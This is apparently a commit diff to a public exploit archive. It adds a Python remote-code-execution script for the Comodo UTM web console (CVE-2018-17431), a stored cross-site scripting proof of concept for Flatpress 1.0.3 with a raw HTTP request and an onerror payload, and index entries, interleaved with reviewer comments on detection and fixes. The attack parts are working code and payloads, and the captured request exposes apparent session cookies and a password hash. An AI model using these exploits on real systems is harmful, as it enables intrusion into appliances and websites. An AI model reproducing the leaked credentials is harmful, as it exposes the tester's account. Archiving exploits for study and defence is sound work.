DB: 2020-09-23
2 changes to exploits/shellcodes:
- Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
- Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
parent
87f49d4427
commit
1a8b74a305
3 changed files with 86 additions and 0 deletions
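--- a/exploits/multiple/webapps/48825.py
+++ b/exploits/multiple/webapps/48825.py
@@ -0,0 +1,50 @@
+# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
+# Date: 2018-08-15
+# Exploit Author: Milad Fadavvi
+# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
+# Vendor Homepage: https://www.comodo.com/
+# Version: Releases before 2.7.0 & 1.5.0
+# Tested on: Windows=Firefox/chrome - Kali=firefox
+# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
+# CVE : CVE-2018-17431
+# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
+# CVSS 3 score: 9.8
+
+import requests
+
+def RndInt(Lenght):
+from random import choice
+from string import digits
+
+RandonInt = ''.join([choice(digits) for n in range(Lenght)])
+return str(RandonInt)
+
+if __name__ == "__main__":
+
+IP = input("IP: ")
+Port = input("Port: ")
+
+Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
+'''For more info about command try to read manual of spesefic version of Comodo UTM and
+exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
+'''
+
+BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
+BaseNComdURL = BaseURL + "&k=" + Command
+LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
+FullURL = BaseNComdURL + LastPart
+AddetionalEnter = BaseURL + "&k=%0a" + LastPart
+
+try:
+FirstResponse = requests.get(FullURL).text
+except:
+print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
+exit(1)
+
+SecondResponse = requests.get(AddetionalEnter).text
+if SecondResponse.find("Configuration has been altered") == -1:
+print("\nExploit Failed!\n")
+exit(1)
+else:
+print("\nOK! Command Ran!\n")
+exit(0)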
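Review bot: The header documents the affected range inconsistently: the title names 2.7.0 while the `# Version:` line says "Releases before 2.7.0 & 1.5.0", so a reader triaging an appliance cannot tell whether 2.7.0 itself is affected. That line should restate the ranges as the CVE-2018-17431 advisory gives them, e.g. `# Version: <affected ranges per the CVE-2018-17431 advisory>`. The `Command` assignment also needs a fuller comment than `## Disable SSH`, such as `# Default payload decodes to "service\nssh\ndisable\n": it changes appliance configuration, it is not a read-only check.` For detection, both GETs are sent without credentials or cookies, which suggests `/manage/webshell/u` is reachable unauthenticated. Requests to that path with a URL-encoded `k=` parameter containing `%0a` are the artefact to look for in web-console logs, and the "Configuration has been altered" response is what the script treats as success.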
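--- a/exploits/php/webapps/48826.txt
+++ b/exploits/php/webapps/48826.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
+# Google Dork: -
+# Date: 2020-09-19
+# Exploit Author: Alperen Ergel
+# Vendor Homepage: https://www.flatpress.org/
+# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
+# Version: 1.0.3
+# Tested on: windows 10 / xampp
+# CVE : -
+
+
+# Proof Of Content
+
+POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 223
+Origin: http://localhost/
+Connection: close
+Referer: http://localhost/flatpress/admin.php?p=entry&action=write
+Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
+Upgrade-Insecure-Requests: 1
+
+_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS×tamp=1600526382&
+entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue
+
+
+# Snipp
+
+content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>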
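Review bot: The `Cookie:` line of the captured request publishes what look like the tester's own session values: a username in `fpuser_…`, a 32-hex `fppass_…` value that is presumably a password hash, a `fpsess_…` session id and Google Analytics identifiers. These should be replaced with placeholders before the write-up is committed, e.g. `Cookie: fpuser_<id>=<user>; fppass_<id>=<redacted>; fpsess_<id>=<redacted>`. The write-up also never states the privilege the request needs. It posts to `admin.php?p=entry&action=write` with a `_wpnonce`, which suggests an authenticated session that can write entries, and a line saying so would let readers judge the impact. A short remediation note is missing as well: that the `content` field of an entry should be sanitised or output-encoded when rendered.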
|
@ -40649,6 +40649,8 @@ id,file,description,date,author,type,platform,port
|
|||
48822,exploits/php/webapps/48822.txt,"Seat Reservation System 1.0 - 'id' SQL Injection",2020-09-21,Augkim,webapps,php,
|
||||
48823,exploits/hardware/webapps/48823.py,"Mida eFramework 2.9.0 - Back Door Access",2020-09-21,elbae,webapps,hardware,
|
||||
48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple,
|
||||
48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,
|
||||
48826,exploits/php/webapps/48826.txt,"Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting",2020-09-22,"Alperen Ergel",webapps,php,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
|